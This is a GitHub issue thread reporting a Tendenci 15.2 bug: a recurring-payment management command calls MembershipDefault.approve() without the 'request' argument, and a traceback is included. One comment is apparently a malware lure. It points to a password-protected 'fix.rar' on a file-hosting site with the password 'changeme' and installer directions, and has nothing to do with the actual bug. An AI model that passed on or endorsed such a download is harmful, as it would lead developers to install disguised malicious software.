### ISSUE TITLE
TypeError: MembershipDefault.approve() missing 1 required positional argument: 'request'

### ISSUE THREAD

**Issue by BenSturmfels** [tendenci/tendenci#1307]
After upgrading to Tendenci 15.2, I'm getting the following error during the `make_recurring_payment_transactions` management command run by `run_nightly_commands`:

2024-08-27 02:32:31 ERROR run_recurring_payment: Error processing recurring payment https://www.itpa.org.au/rp/275/...

```
Traceback (most recent call last):
  File "/srv/venvs/itpa-django-cp310/lib/python3.10/site-packages/tendenci/apps/recurring_payments/management/commands/make_recurring_payment_transactions.py", line 53, in handle
    run_a_recurring_payment(rp, verbosity)
  File "/srv/venvs/itpa-django-cp310/lib/python3.10/site-packages/tendenci/apps/recurring_payments/utils.py", line 321, in run_a_recurring_payment
    payment_transaction = rp_invoice.make_payment_transaction(payment_profile_id, membership=membership)
  File "/srv/venvs/itpa-django-cp310/lib/python3.10/site-packages/tendenci/apps/recurring_payments/models.py", line 695, in make_payment_transaction
    membership.approve()
TypeError: MembershipDefault.approve() missing 1 required positional argument: 'request'
```

It looks as though the function signature for `MembershipDefault.approve()` has recently changed, but this call hasn't been updated. Unfortunately, there's no request in context here, so may not be a trivial fix.

**Comment by vineet1401** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jennyq** [comment]
Thanks @BenSturmfels ! Great catch!

**Comment by BenSturmfels** [comment]
Thanks very much for the quick response @jennyq!
